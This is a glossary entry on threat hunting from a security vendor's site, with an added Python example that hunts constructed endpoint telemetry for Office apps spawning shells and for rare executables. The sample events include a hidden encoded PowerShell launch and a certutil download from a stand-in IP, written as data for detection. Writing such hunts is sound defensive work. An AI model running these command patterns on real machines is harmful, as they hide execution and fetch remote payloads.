Threat Hunting
Proactive, human-led search for threats that have evaded automated detection within an environment.
Full Definition
Threat hunting is the proactive, iterative practice of searching networks, endpoints, and datasets for malicious activity that has evaded automated security controls. Unlike reactive incident response, which begins when an alert fires, threat hunting assumes that adversaries are already present in the environment and looks for evidence of them before any control has raised an alarm.

Effective hunters start from a hypothesis grounded in threat intelligence (known attacker TTPs, recent IoCs, threats targeting their industry) or in a known gap in detection coverage, then test it against telemetry using data analytics, forensic tools, and their own knowledge of what normal looks like in that environment. A hunt that finds nothing is not wasted: it raises confidence in that part of the environment and usually leaves behind an improved baseline or a new automated detection so the same question does not have to be asked by hand again. A hunt that finds something hands off to incident response with evidence already collected.

Threat hunting requires skilled analysts with deep knowledge of attacker techniques, the environment's normal baselines, and forensic tooling. It is a force multiplier for SOC teams because it shortens dwell time, the period between an attacker entering a network and being detected. Industry reports put that figure anywhere from a couple of weeks (median dwell time observed in incident-response engagements) to over 200 days (mean time to identify a breach), depending on the measure used and the breaches sampled; every hunt that surfaces an intrusion closes that window earlier than waiting for an alert would.
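The hypothesis-then-test loop described above, as an added example that is not code from the original page or from Whiteintel. It runs two hunts over constructed process-creation telemetry: one hypothesis-driven (an Office application spawning a shell or script interpreter, a common initial-access pattern) and one baseline-driven (stacking, which counts how many hosts each executable ran on and treats the long tail as the triage list). The field names, host names, the fleet of twenty workstations and every event are constructed sample data; the encoded PowerShell payload decodes to a harmless three-letter string chosen to show the enrichment step.

```python
"""Hypothesis-driven threat hunt over constructed endpoint telemetry.

Added example; this is not code from the original page or from Whiteintel.
The records mimic the fields of a process-creation log (host, parent image,
image, command line), but every event here is constructed sample data.
"""
import base64
import re
from collections import defaultdict


def baseline_fleet(n_hosts=20):
    """Constructed 'normal' activity: the same routine processes on every host."""
    events = []
    for i in range(1, n_hosts + 1):
        host = f"ws{i:02d}"
        events += [
            {"host": host, "parent": "services.exe", "image": "svchost.exe",
             "cmd": "svchost.exe -k netsvcs"},
            {"host": host, "parent": "explorer.exe", "image": "winword.exe",
             "cmd": "winword.exe notes.docx"},
            {"host": host, "parent": "explorer.exe", "image": "outlook.exe",
             "cmd": "outlook.exe"},
        ]
    return events


# Constructed anomalies mixed into the fleet: two that should worry a hunter,
# plus two benign rarities (an Excel launch and a print helper) that the
# stacking hunt will also surface and the analyst must triage away.
SUSPECT_EVENTS = [
    {"host": "ws03", "parent": "winword.exe", "image": "powershell.exe",
     "cmd": "powershell.exe -nop -w hidden -enc SQBFAFgA"},
    {"host": "ws12", "parent": "explorer.exe", "image": "excel.exe",
     "cmd": "excel.exe budget.xlsx"},
    {"host": "ws12", "parent": "excel.exe", "image": "cmd.exe",
     "cmd": "cmd.exe /c certutil -urlcache -f http://198.51.100.7/a.txt a.txt"},
    {"host": "ws07", "parent": "winword.exe", "image": "splwow64.exe",
     "cmd": "splwow64.exe 8192"},
]

EVENTS = baseline_fleet() + SUSPECT_EVENTS

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}


def hunt_office_to_script_host(events):
    """Hypothesis A: initial access via malicious documents. An Office app has
    no routine reason to spawn a shell or script interpreter, so every such
    parent/child pair is a lead worth pulling the full process tree for."""
    return [e for e in events
            if e["parent"] in OFFICE_APPS and e["image"] in SCRIPT_HOSTS]


def hunt_rare_images(events, max_hosts=1):
    """Hypothesis B (stacking): attacker tooling runs on few hosts while
    routine software runs everywhere. Count distinct hosts per image and
    return the long tail; it is a triage list, not an alert list."""
    hosts_by_image = defaultdict(set)
    for e in events:
        hosts_by_image[e["image"]].add(e["host"])
    return sorted(img for img, hosts in hosts_by_image.items()
                  if len(hosts) <= max_hosts)


def decode_encoded_powershell(cmd):
    """Enrich a PowerShell hit: -enc / -EncodedCommand carries a base64 blob of
    UTF-16LE script. Returns the decoded script, or None if the flag is absent."""
    m = re.search(r"-(?:enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmd, re.I)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("utf-16-le")


def run_hunt(events):
    """Run both hypotheses and return findings tagged with the hypothesis that
    produced them, so a confirmed hit can be turned into a detection rule."""
    findings = []
    for e in hunt_office_to_script_host(events):
        decoded = (decode_encoded_powershell(e["cmd"])
                   if e["image"] == "powershell.exe" else None)
        findings.append({"hypothesis": "office_to_script_host", "host": e["host"],
                         "parent": e["parent"], "image": e["image"],
                         "decoded": decoded})
    for img in hunt_rare_images(events):
        findings.append({"hypothesis": "rare_image", "image": img})
    return findings


if __name__ == "__main__":
    for finding in run_hunt(EVENTS):
        print(finding)
```

On this data the first hunt returns exactly the two document-spawned interpreters, while stacking returns four executables, two of which are benign. That gap is the point: stacking is cheap and catches what no signature describes, but its output needs an analyst who knows the environment's baseline. Whichever hunt confirms a hit, the parent/child pair or the rare image becomes the seed of an automated detection so the next occurrence is caught without a hunt.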
Related Terms
Security Operations Center (SOC)
A centralized team and facility responsible for monitoring, detecting, and responding to cybersecurity threats.
Category: Defensive Security

Indicators of Compromise (IoC)
Forensic artifacts that indicate a system may have been breached or is actively under attack.
Category: Threat Intelligence

SIEM (Security Information and Event Management)
A platform that aggregates and correlates security event logs to detect threats and support incident response.
Category: Defensive Security

Advanced Persistent Threat (APT)
A prolonged, targeted cyberattack by a sophisticated, often state-sponsored threat actor.
Category: Threat Actors

Monitor Your Exposure on Whiteintel
Understanding threats is the first step. Whiteintel continuously monitors dark web sources, stealer logs, and breach databases so you know the moment your organization's data is at risk.